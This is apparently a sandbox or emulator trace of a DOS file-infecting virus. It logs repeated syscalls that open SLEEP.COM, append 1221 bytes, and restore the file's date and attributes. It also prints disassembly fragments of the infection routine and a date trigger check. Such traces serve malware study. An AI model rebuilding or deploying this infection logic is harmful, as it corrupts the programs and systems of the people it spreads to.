2018-12-25T12:03:28.947724238Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.951832615Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.95435756Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.957224328Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.959601455Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.968823786Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.970195173Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.981865374Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.991406888Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.994588001Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.001320212Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.00748277Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.009327735Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.019594356Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.021162555Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.027489452Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.03059174Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.03303063Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.035492373Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.038084937Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.04721247Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.048786923Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.057715194Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.067792729Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.070602059Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.077791949Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.084053514Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.086339922Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.096950426Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.099992617Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.106950458Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.110264028Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.113482654Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.116812193Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.118885531Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.129101699Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.130791582Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.138480673Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.148584519Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.150868341Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.154983604Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.212689982Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.217036729Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.221068908Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.222832695Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.229348037Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.235804022Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.242045861Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.251077219Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.266500122Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.268210194Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.274806525Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.284241362Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.286935636Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.290091616Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.292687656Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.303081019Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.304568583Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.312713069Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.32236073Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.324895936Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.338627802Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.345026978Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.347153935Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.357550708Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.359516617Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.371176513Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.378720552Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.381544735Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.384404773Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.386689801Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.395708919Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.397232721Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.405354635Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.424292061Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.427851332Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.435191749Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.441895003Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.444602494Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.455583073Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.457780142Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.464752706Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.468139694Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.470675561Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.47320457Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.489354599Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.498750408Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.500170785Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.508191759Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.518133313Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.520335053Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.52475261Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.428949687Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.43303766Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.438316153Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.441449656Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.448530383Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.456428798Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.464622276Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.466982223Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.491400143Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.500607283Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.508084753Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.511160813Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.514757094Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.517737943Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.519922315Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.530989206Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.533089877Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.542085866Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.554216289Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.557366842Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.564669571Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.572502859Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.575492063Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.586757208Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.589305727Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.598416675Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.601543414Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.610674011Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.613016667Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.614472873Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.621653411Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.639342539Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.647351836Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.655367974Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.659256676Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.666752613Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.674362317Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.677600502Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.686728131Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.688925163Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.693732624Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.695744475Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.697581718Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.699913532Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.702047479Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.711214365Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.71263302Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.721949316Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.7330519Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.735607909Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.743370564Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.45890108Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.463361126Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.468019276Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.469640002Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.484210361Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.49155442Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.500177344Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.503040037Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.521924786Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.524460525Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.532368741Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.536978329Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.54025177Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.543503022Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.546675158Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.557856121Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.559994297Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.569865372Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.581082438Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.584124688Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.592428515Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.600144788Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.602931303Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.615788073Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.618232284Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.625986282Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.629257619Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.632905689Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.63615722Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.638635963Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.652772382Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.655414364Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.664368029Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.677487381Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.681706322Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.690413139Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.699324038Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.701944506Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.713102231Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.716066013Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.723890624Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.727516333Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.730947203Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.734738734Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.736902254Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.747199779Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.749567944Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.758247596Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.769307952Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.772695311Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.777435409Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.544034166Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.548330782Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.552331969Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.55358862Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.560783339Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.567385668Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.573826711Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.576167383Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.58840705Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.59011156Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.59660281Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.600035166Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.602861446Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.605746627Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.608895291Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.61950292Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.621050426Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.630330663Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.640529562Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.64351353Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.650836441Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.657479436Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.659957179Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.674350246Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.676232517Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.688210278Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.695307443Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.697843925Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.700824808Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.702955699Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.726650514Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.728189686Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.742577248Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.753194125Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.756104541Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.762833351Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.770326708Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.772750082Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.782712448Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.785609936Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.792651494Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.795596853Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.798777406Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.801518416Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.803420742Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.813477355Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.815751342Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.823467348Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.833040146Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.835685253Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.839556784Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.844601896Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.848890937Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.852926275Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.853864719Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.860209261Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.866556001Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.872550501Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.875055355Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.893100024Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.894703951Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.906216996Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.910549786Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.912092044Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.914031699Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.916148866Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.925225027Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.926817582Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.934685113Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.944431886Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.947017096Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.956414626Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.962789217Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.964885051Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.976386844Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.978274867Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.984852716Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.988036742Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.990790512Z 64 PC: 12d10 | Write file or device (See above)
